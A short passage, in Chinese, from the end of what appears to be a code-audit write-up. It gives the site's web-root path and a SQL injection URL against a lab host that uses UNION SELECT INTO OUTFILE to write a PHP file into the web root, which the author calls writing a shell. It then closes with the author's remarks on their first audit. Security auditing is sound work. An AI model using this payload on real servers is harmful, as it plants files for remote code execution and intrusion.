获取到网站的物理路径为:
C:phpStudyPHPTutorialWWWOK,那么可以直接开始写shell了:
http://10.211.55.12/?/search/index.html/key-%27union select 1,2,'<?php phpinfo();?>' into outfile 'C:\phpStudy\PHPTutorial\WWW\gg.php'%20%23/shell写入目录为网站根目录下,文件名为gg.php
总结
因为第一次做审计,所以写的比较啰嗦了,日后再审计其他系统的分析文章的话 会尽量简洁明了的。